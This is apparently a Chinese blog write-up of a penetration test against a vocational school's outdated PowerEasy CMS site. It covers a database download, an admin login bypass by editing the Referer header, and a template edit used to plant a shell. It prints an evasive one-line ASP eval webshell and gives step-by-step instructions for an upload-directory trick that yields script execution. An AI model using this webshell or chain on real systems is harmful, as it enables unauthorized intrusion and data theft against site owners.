[渗透实战]记录某职业中学测试

记录一下对于一个职业学院的渗透测试过程。

团队的力量很强大，安全无小事！

0x01 偶遇&吐槽：

在机缘巧合下，遇见了这个网站，发现有一个旧版网站，还是动易的CMS，指纹查看一下：

网站中还存在这些有趣的东西：

然后使用御剑扫了一下，发现可以下载数据库，然后我就把这个洞，提交给了360的补天平台，好歹算个学校吧，一共提交了两次，第一次说漏洞不够详细。。。（一个数据库下载漏洞，能有多详细，难道还能把数据下载了发你不成）。

第二次我修改了提交，审核说，漏洞存在，但是不构成威胁…(这审核是实习生吧？)

真的是无语的审核了，本来有接近一年没去补天，就是因为审核的原因，本以为一年后会好一些，没想到。。。虽然平台不怎么样，但是补天的线下沙龙还是做的很不错的。

因此下面在各位团队成员的深挖下，验证了此网站并不是固若金汤！

---

0x02 深入测试：

在数据库中找到了一个user表，在网站的新闻中心有一个登陆表单，登录后，进入用户管理后台：

其实这个算不上后台，有上传点，但是没法儿利用，看到url中的user就知道是用户中心而非管理后台了，动易的管理后台登录地址为：/Admin/Admin_login.asp

在数据库中找到admin账户，登陆发现：

问了一下X1r0z这个女装大佬[滑稽]，需要修改Referer中的参数，去掉81port，分析认为：这是一个旧版网站，原本是80端口的，管理员为了保留就转移到了81端口，但是动易的程序在后台并没有修改判断条件，就导致了怎么登陆也进入不了后台的情况

现在成功登录后台，登录的时候需要设置referer，其他的不需要

---

0x03 获取Shell：

X1r0z提供的方法是在系统管理的下载中心中倒腾，我就直接修改模版了，因为兼容性的问题，按钮没反应，所以就使用IE6一点点弄的，真的很麻烦…

一个过狗的ASP小马：

<% 
dim x1,x2 
x1 = request("x") 
x2 = x1 
eval x2 
%>

最后连接得到：

0x04 总结：

当然已经做好了善后的工作，已经清除了小马，帮管理员填上了洞，数据库确实没办法了。推荐大家提交CNVD或者漏洞盒子，漏洞银行或者对应的SRC厂商！

最后再强调一下，团队的力量是强大的，安全无小事！！！

---

0x05 补充：

以下内容来自 X1r0z 小裙子 (<_<)

系统设置 - 网站频道管理 - 下载中心 - 频道类型

将 上传文件的保存目录 改成 test.asp

最后左栏找到对应的频道直接上传, 抓包的路径不全, 还需要手动拼接下.

下载中心的目录为 /Soft/

其它频道的目录在 频道类型 - 频道目录 里.